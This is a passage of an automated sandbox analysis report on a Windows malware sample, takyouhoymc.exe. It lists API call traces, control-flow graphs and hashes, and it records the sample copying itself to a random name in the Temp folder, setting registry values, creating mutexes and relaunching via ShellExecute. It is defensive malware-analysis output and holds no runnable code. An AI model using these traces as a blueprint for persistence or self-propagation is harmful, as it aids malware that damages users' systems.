                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000091,00000004,?,?,00000000), ref: 00406599
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNEL32(?,00000000,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004), ref: 004065BC
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004,?,?,00000000), ref: 004065C4
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNEL32(?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001), ref: 004065E7
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004,?,?,00000000), ref: 004065EF
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNEL32(?,00000000,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004), ref: 00406612
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004,?,?,00000000), ref: 0040661A
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNEL32(?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001), ref: 0040663D
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004,?,?,00000000), ref: 00406646
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004,?,?,00000000), ref: 0040664E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Sleep$Value$CloseCreate
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3184397383-0
                                                                                                                                                                                                                                                      • Opcode ID: 93dc55894faf6f814b2ddcf65b5400ae89b31cf79d55cf43324b23fa800c9202
                                                                                                                                                                                                                                                      • Instruction ID: 2bdb2e7eba901f38f779a2f5ef2eb5fdc224b4dd96516dc32fec66fda6d992c8
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 93dc55894faf6f814b2ddcf65b5400ae89b31cf79d55cf43324b23fa800c9202
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B6E11FB6A40218BEE711ABD1DC4AEFF7F7CDB44B05F50007ABA04A1092EA715F949B35

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 597 40da5b-40da7a InitializeCriticalSection 598 40da7c 597->598 599 40da7f-40da85 597->599 598->599 600 40dac0-40daee SetErrorMode call 408d16 599->600 601 40da87 599->601 608 40daf4-40db26 GetSystemDirectoryA lstrcatA call 414bf8 call 40c0b1 call 40d4a9 600->608 609 40dcae-40dcb4 600->609 603 40da8a-40da8d 601->603 604 40da89 603->604 605 40da8f-40da94 603->605 604->603 607 40da99-40daa4 call 413761 605->607 614 40da96 607->614 615 40daa6-40dab8 call 413761 607->615 623 40dba3-40dbad call 40c54e 608->623 624 40db28-40db2c 608->624 614->607 615->600 622 40daba-40dabd 615->622 622->600 623->609 633 40dbb3-40dbb5 623->633 625 40db79-40db7b 624->625 626 40db2e-40db39 call 40c54e 624->626 625->623 628 40db7d-40db87 call 40c54e 625->628 635 40db5b-40db65 call 40c54e 626->635 636 40db3b-40db44 626->636 628->609 639 40db8d-40db94 628->639 637 40dbb7-40dbc6 lstrcpyA call 40d59d 633->637 638 40dbcc 633->638 635->609 649 40db6b-40db75 635->649 640 40db52-40db59 636->640 641 40db46-40db4c lstrcpyA 636->641 646 40dbcb 637->646 644 40dbd3-40dbdd call 40a949 call 40d7d0 638->644 645 40db95-40dba1 lstrcpyA 639->645 640->644 641->640 654 40dbe9-40dbf0 call 40d4e2 644->654 645->638 646->638 649->638 652 40db77 649->652 652->645 657 40dbf2-40dc58 WSAStartup InitializeCriticalSection * 11 654->657 658 40dbdf-40dbe4 call 413df9 call 413dd8 654->658 660 40dc70-40dc9f call 40d158 call 40c7e0 CreateThread * 2 657->660 661 40dc5a-40dc61 call 40d2ec 657->661 658->654 674 40dca1 call 410a09 660->674 675 40dca6 call 40c6a0 660->675 669 40dc63-40dc6a call 40c4ce 661->669 670 40dc6b call 410b43 661->670 669->670 670->660 674->675 679 40dcab 675->679 679->609
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(00458D80,76AF0A60,00000000), ref: 0040DA72
                                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00008003), ref: 0040DAC5
                                                                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32(C:\Windows\system32\,00000104), ref: 0040DAFF
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(C:\Windows\system32\,0042A3B0), ref: 0040DB0B
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,00000001), ref: 0040DB4C
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,00000001), ref: 0040DB9B
                                                                                                                                                                                                                                                      • WSAStartup.WS2_32(00000101,?), ref: 0040DBFE
                                                                                                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(0044F7B8), ref: 0040DC09
                                                                                                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(0044F79C), ref: 0040DC10
                                                                                                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(00459708), ref: 0040DC17
                                                                                                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(0045983C), ref: 0040DC1E
                                                                                                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(0044F7E0), ref: 0040DC25
                                                                                                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(00459674), ref: 0040DC2C
                                                                                                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(004596EC), ref: 0040DC33
                                                                                                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(004596D4), ref: 0040DC3A
                                                                                                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(004596BC), ref: 0040DC41
                                                                                                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(004596A4), ref: 0040DC48
                                                                                                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(0045968C), ref: 0040DC4F
                                                                                                                                                                                                                                                        • Part of subcall function 0040C54E: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 0040C591
                                                                                                                                                                                                                                                        • Part of subcall function 0040C54E: CreateMutexA.KERNEL32(00000000,00000001,00000000), ref: 0040C5A7
                                                                                                                                                                                                                                                        • Part of subcall function 0040C54E: GetLastError.KERNEL32 ref: 0040C5AF
                                                                                                                                                                                                                                                        • Part of subcall function 0040C54E: CloseHandle.KERNEL32(00000000), ref: 0040C5BA
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,0040C431,00000000,00000000,00000000), ref: 0040DC8A
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,0040D1D8,00000000,00000000,00000000), ref: 0040DC96
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalInitializeSection$Create$ErrorMutexThreadlstrcpy$CloseDirectoryHandleLastModeOpenStartupSystemlstrcat
                                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe$C:\Windows\system32\
                                                                                                                                                                                                                                                      • API String ID: 3287937100-2541385624
                                                                                                                                                                                                                                                      • Opcode ID: 9633477999c02ddfe6c2a7f9c99b52244ab6714c580f5a93abaa768d4b997d80
                                                                                                                                                                                                                                                      • Instruction ID: 4a85369abd0a2a9a89e7fd51754485e40c171d24ce782e2c1052b94615d691b9
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9633477999c02ddfe6c2a7f9c99b52244ab6714c580f5a93abaa768d4b997d80
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CF518D71A44254AAEA217BF56C46FAB3A589F4175AF25003BFC41311C38ABC5C4ECA7F

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 702 40d59d-40d619 lstrcpyA lstrlenA 703 40d632-40d638 702->703 704 40d61b-40d623 702->704 707 40d643-40d64b 703->707 705 40d625-40d628 704->705 706 40d62a-40d62c 704->706 705->704 705->706 706->703 710 40d7cb-40d7cf 706->710 708 40d63a-40d63c 707->708 709 40d64d-40d64f 707->709 708->710 712 40d642 708->712 709->710 711 40d655-40d65b 709->711 713 40d674-40d72d call 414510 call 4135c8 lstrcpyA lstrcatA * 3 lstrcpyA lstrcatA * 4 call 413a97 711->713 714 40d65d-40d665 711->714 712->707 723 40d7c0-40d7c9 GetCurrentProcess SetPriorityClass 713->723 724 40d733-40d741 GetCurrentProcess SetPriorityClass 713->724 715 40d667-40d66a 714->715 716 40d66c-40d66e 714->716 715->714 715->716 716->710 716->713 723->710 725 40d743-40d74e call 414787 724->725 728 40d750-40d75f Sleep 725->728 729 40d761-40d777 call 413cc5 725->729 728->725 728->729 732 40d779 729->732 733 40d77d-40d790 call 413cc5 729->733 732->733 736 40d792-40d799 733->736 737 40d79b-40d7a7 733->737 738 40d7a8-40d7b4 ShellExecuteA 736->738 737->738 738->723 739 40d7b6-40d7be lstrcpyA 738->739 739->723
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,776AC310,00000000,00000000), ref: 0040D5FF
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040D608
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000), ref: 0040D6A3
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042A3B0), ref: 0040D6B8
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 0040D6C5
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0040DBCB), ref: 0040D6D1
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000), ref: 0040D6E1
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042A3B0), ref: 0040D6EB
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 0040D6F8
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042A570), ref: 0040D706
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0040DBCB), ref: 0040D712
                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000080), ref: 0040D738
                                                                                                                                                                                                                                                      • SetPriorityClass.KERNEL32(00000000), ref: 0040D73F
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000000C8), ref: 0040D755
                                                                                                                                                                                                                                                      • ShellExecuteA.SHELL32(00000000,00000000,?,0040DBCB,00000000,00000001), ref: 0040D7AA
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,?), ref: 0040D7BE
                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000020), ref: 0040D7C2
                                                                                                                                                                                                                                                      • SetPriorityClass.KERNEL32(00000000), ref: 0040D7C9
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrcat$lstrcpy$ClassCurrentPriorityProcess$ExecuteShellSleeplstrlen
                                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe
                                                                                                                                                                                                                                                      • API String ID: 2073929028-2091069259
                                                                                                                                                                                                                                                      • Opcode ID: b81710890596d086b68fea6b726275e9a4db65c3f40f31fbfe46a78a7b9d0545
                                                                                                                                                                                                                                                      • Instruction ID: 1a0aace4e15970706aaa44d2e18305b865cd50f5bf73cf5a6aff2fe7f313b9f7
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b81710890596d086b68fea6b726275e9a4db65c3f40f31fbfe46a78a7b9d0545
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A351C672C00658AADF219BE09C49FDFBB7CAF44301F0404ABE548B3181DA759B89CF69

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 740 4017f4-40182f call 421df0 call 41382b 745 401831-401833 740->745 746 401838-40187c call 410bf4 call 421c60 SetFileAttributesA CreateFileA 740->746 747 401b88-401b8c 745->747 752 401882-4018a0 ReadFile CloseHandle 746->752 753 401b75-401b87 call 410c3b * 2 746->753 755 4018a5-4018a9 752->755 753->747 757 4018c5-4018c8 755->757 758 4018ab-4018b0 755->758 760 4019c4-401a63 GetTickCount call 421d78 call 421d82 call 421920 GetTickCount call 421d78 call 421d82 757->760 761 4018ce-4018ea call 421db0 757->761 758->757 759 4018b2-4018c3 758->759 759->755 759->757 796 401aa1-401aea call 410bf4 GetTickCount call 421d78 call 421c60 call 421920 760->796 797 401a65 760->797 769 4018ec-4018f7 761->769 770 40192e-401952 GetTickCount call 421d78 call 421d82 761->770 772 4018fe-401902 769->772 784 401954-40196a call 421d82 770->784 785 40196c-401980 call 421db0 770->785 775 401923-40192c 772->775 776 401904-401908 772->776 775->770 775->772 776->775 780 40190a-401911 776->780 780->775 783 401913-401920 call 41a679 780->783 783->775 784->785 785->760 795 401982-40198d 785->795 799 401994-401998 795->799 819 401b27-401b52 SetFileAttributesA CreateFileA 796->819 820 401aec-401af8 796->820 800 401a68-401a9c call 421d82 * 2 797->800 802 4019b9-4019c2 799->802 803 40199a-40199e 799->803 814 401a9e 800->814 802->760 802->799 803->802 806 4019a0-4019a7 803->806 806->802 809 4019a9-4019b6 call 41a5dd 806->809 809->802 814->796 821 401b72 819->821 822 401b54-401b6e WriteFile CloseHandle 819->822 823 401afd-401b25 call 421920 820->823 821->753 822->821 823->819 826 401afa 823->826 826->823
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 0041382B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,76AF3520,00000000,00413BDE,?,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe), ref: 00413843
                                                                                                                                                                                                                                                        • Part of subcall function 0041382B: GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0040D13D,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,00000000), ref: 0041384D
                                                                                                                                                                                                                                                        • Part of subcall function 0041382B: CloseHandle.KERNEL32(00000000,?,?,?,?,0040D13D,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,00000000), ref: 00413856
                                                                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000080), ref: 00401857
                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00401871
                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040188B
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00401892
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040192E
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: File$CloseCreateHandle$AttributesCountReadSizeTick
                                                                                                                                                                                                                                                      • String ID: ($no key$B$B
                                                                                                                                                                                                                                                      • API String ID: 1796527405-2363439422
                                                                                                                                                                                                                                                      • Opcode ID: b24affbcf6bccaa63e0d47b82a2edc9452599d9e918e857ba6cd2f70874563eb
                                                                                                                                                                                                                                                      • Instruction ID: 99ae764c1ea9729c4b7b0c9cd9d2d79b54af91cbee982e745e221d5f3147cf5d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b24affbcf6bccaa63e0d47b82a2edc9452599d9e918e857ba6cd2f70874563eb
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E2B14BB2E00214EBDB209BA5DC45BEEB7B9EF04314F44407AF901B72A1D7789E51CB99

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,C:\Windows\system32\), ref: 0040D21B
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042A3B0), ref: 0040D223
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,.exe), ref: 0040D254
                                                                                                                                                                                                                                                        • Part of subcall function 00414D8E: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,0040D2A9,00000000), ref: 00414DA4
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040D22A
                                                                                                                                                                                                                                                        • Part of subcall function 00413663: lstrlenA.KERNEL32(4941262305804196,?,?,00000000), ref: 00413691
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\), ref: 0040D276
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042A3B0), ref: 0040D27E
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040D285
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,.exe), ref: 0040D29D
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040D2B6
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040D2CA
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040D2D5
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00002710), ref: 0040D2E4
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrcat$CountTicklstrlen$lstrcpy$CreateFileSleep
                                                                                                                                                                                                                                                      • String ID: .exe$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32\
                                                                                                                                                                                                                                                      • API String ID: 157799668-577769959
                                                                                                                                                                                                                                                      • Opcode ID: a14428d9e2af36542f807380719714de05a372dac77148e5a00d34e4d435e05c
                                                                                                                                                                                                                                                      • Instruction ID: 1dd661079137dd266a11f3d998b1c56a89a9d41e77c259510d1bc51e0b0dfb00
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a14428d9e2af36542f807380719714de05a372dac77148e5a00d34e4d435e05c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A21A772504315ABC610FFA0EC4599BB7DCAB84310F11082FF941A3193DA78D95D8BAB

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,0042A788), ref: 0040CF28
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe), ref: 0040CF3C
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,0042A784), ref: 0040CF4A
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\), ref: 0040CF59
                                                                                                                                                                                                                                                        • Part of subcall function 004136FF: lstrlenA.KERNEL32(4941262305804196,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,0040C034,?,00000000,0040D80A), ref: 00413708
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,-00000005), ref: 0040CF72
                                                                                                                                                                                                                                                        • Part of subcall function 00413663: lstrlenA.KERNEL32(4941262305804196,?,?,00000000), ref: 00413691
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,.exe), ref: 0040CF93
                                                                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000080), ref: 0040CFCF
                                                                                                                                                                                                                                                      • CopyFileA.KERNEL32(C:\Users\user\AppData\Local\Temp\takyouhoymc.exe,00000000,00000000), ref: 0040CFE3
                                                                                                                                                                                                                                                      • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,C:\Users\user\AppData\Local\Temp\,00000001), ref: 0040D00B
                                                                                                                                                                                                                                                        • Part of subcall function 00413A97: GetFileAttributesA.KERNEL32(00000000,0040C71D,00000000), ref: 00413A9B
                                                                                                                                                                                                                                                        • Part of subcall function 0041382B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,76AF3520,00000000,00413BDE,?,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe), ref: 00413843
                                                                                                                                                                                                                                                        • Part of subcall function 0041382B: GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0040D13D,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,00000000), ref: 0041384D
                                                                                                                                                                                                                                                        • Part of subcall function 0041382B: CloseHandle.KERNEL32(00000000,?,?,?,?,0040D13D,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,00000000), ref: 00413856
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
